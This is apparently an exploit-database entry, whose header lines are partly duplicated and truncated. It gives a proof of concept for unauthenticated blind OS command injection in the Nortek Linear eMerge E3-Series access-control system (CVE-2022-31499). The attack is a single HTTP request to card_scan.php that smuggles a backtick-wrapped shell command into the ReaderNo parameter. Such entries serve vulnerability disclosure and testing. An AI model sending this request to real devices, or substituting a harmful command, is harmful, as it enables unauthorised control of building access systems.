# Exploit Author: Omar Hashim
# Version: 0.32-09c
# Vendor home page: https://www.nortekcontrol.com/access-c # Exploit Title: Nortek Linear eMerge E3-Series - Blind OS Command Injection
# Exploit Author: Omar Hashim
# Version: 0.32-09c
# Vendor home page: https://www.nortekcontrol.com/access-control/
# Vendor home page: https://linear-solutions.com/
# Authentication Required: No
# CVE: CVE-2022-31499
# POC:
====================
http:/<HOST:PORT>/card_scan.php?No=1337&ReaderNo=`sleep
20`&CardFormatNo=1337